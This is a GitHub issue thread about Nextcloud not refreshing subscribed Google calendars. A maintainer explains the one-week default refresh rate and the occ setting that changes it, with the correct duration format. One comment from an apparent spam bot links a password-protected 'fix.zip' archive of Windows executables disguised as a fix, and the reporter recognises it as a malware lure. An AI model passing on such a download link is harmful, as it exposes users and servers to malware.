### ISSUE TITLE
Google calendar doesn't refresh

### ISSUE THREAD

**Issue by 31337-4554551n** [nextcloud/calendar#6300]
### Steps to reproduce

1.Add a new calendar>subscription>read only>enter the private google calendar link
2.Refresh > See your google events
3.In google, add an event, or get someone to send you an invite to an event/accept

### Expected behavior

The event shows up in nextcloud calendar

### Actual behaviour

The new event doesn't show up in nextcloud calendar.

To see the event you have to re-add the calendar. It's like it only syncs once when added, instead of doing regular checks.

### Calendar app version

4.7.16

### CalDAV-clients used

Nextcloud webui (but it doesn't show up in any)

### Browser

Firefox or Chromium

### Client operating system

Pop OS

### Server operating system

alpine linux - linuxserver.io docker

### Web server

Nginx

### Database engine version

MariaDB

### PHP engine version

Other

### Nextcloud version

29.0.4

### Updated from an older installed version or fresh install

Updated from an older version

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 31337-4554551n** [comment]
I'm a little weary about running random software from the web on a server...
What is this?
Also, this is alpine linux, and a docker, it doesn't play nice with gcc. There's a github repo I used to try to install gcc to get the recognize app working, no dice sadly.

**Comment by 31337-4554551n** [comment]
This is also an exe and a bunch of dlls, claiming to fix a linux issue on a linux server.

And this boys and girls is why we don't run random crap people send us, and report bots

**Comment by tcitworld** [comment]
The refresh rate of subscribed calendars is set to a 1 week default value : https://docs.nextcloud.com/server/latest/admin_manual/groupware/calendar.html#refresh-rate

**Comment by 31337-4554551n** [comment]
Oh wow, thank you!
Is there a reason this isn't available in the GUI?

So
occ config:app:set dav calendarSubscriptionRefreshRate --value "P10M"
Would set it to every 10 minutes? Is there any harm in this?

**Comment by tcitworld** [comment]
>  Is there a reason this isn't available in the GUI?

It needs https://github.com/nextcloud/calendar/issues/6187

> P10M
> Would set it to every 10 minutes?

Nope, that's every 10 months. Every 10 minutes is `PT10M`.

> Is there any harm in this?

This applies to every calendar for every user of the instance, so if there's a lot of them, your cron will be overloaded with useless refreshments calls. Moreover it's not yet efficient (every calendar event is dropped from the database and recreated). Nextcloud 30 improves this : https://github.com/nextcloud/server/pull/46723

> is there a way to set this through google

Nope, Google doesn't support anything we can use for this unfortunately.

**Comment by 31337-4554551n** [comment]
So I can set it to PT10M
occ config:app:get dav calendarSubscriptionRefreshRate
Gives me nothing, so guessing it's the standard week, though I expected to see it..

So if I set it now, it'll be a bit slow and boggy for a while, but when 30 comes out, it won't be as bad. And if that 6187 gets put it, it'll overwrite what I set here, yea?

**Comment by miaulalala** [comment]
> So I can set it to PT10M occ config:app:get dav calendarSubscriptionRefreshRate Gives me nothing, so guessing it's the standard week, though I expected to see it..
> 
> So if I set it now, it'll be a bit slow and boggy for a while, but when 30 comes out, it won't be as bad. And if that 6187 gets put it, it'll overwrite what I set here, yea?

Yeah it will be slow any time the cron runs. 30 will definitely imporve this. 6187 will probably not be in 30 (as in, Calendar 5.0.0), but might make it to Calendar 5.1.0
